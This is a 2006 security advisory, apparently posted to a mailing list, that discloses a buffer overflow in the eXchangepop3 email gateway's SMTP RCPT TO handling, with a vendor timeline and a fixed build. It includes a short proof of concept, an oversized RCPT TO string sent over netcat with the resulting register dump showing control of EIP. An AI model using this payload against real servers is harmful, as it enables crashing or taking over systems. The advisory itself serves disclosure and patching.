<<< Date Index >>>     <<< Thread Index >>>

Exchangepop3 rcpt buffer overflow vulnerability




Author: securma massine <securma@xxxxxxxx>
MorX Security Research Team
http://www.morx.org

Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from Internet POP3 email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a large buffer, allow remote users to set a new Instruction Pointer to execute arbitrary code and gain access on system.

C:\>nc 127.0.0.1 25
220 aaa ESMTP
mail  [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38 edi=0f010001 eip=41414141 esp=0221f750 ebp=00000001 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
41414141 ??               ???

Affected Software(s):
Exchangepop3 v 5.0 (build 050203)

Affected platform(s):
Windows

Exploit/Proof of Concept:
http://www.morx.org/expl5.txt

Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
http://www.exchangepop3.com/

History:
14/01/2006  initial vendor contact
16/01/2006  vendor received details about the vulnerabilty
02/02/2006  vendor released the fixed build

Disclaimer:
this entire document is for eductional, testing and demonstrating purpose only.

Greets:
Greets to undisputed and  all MorX members.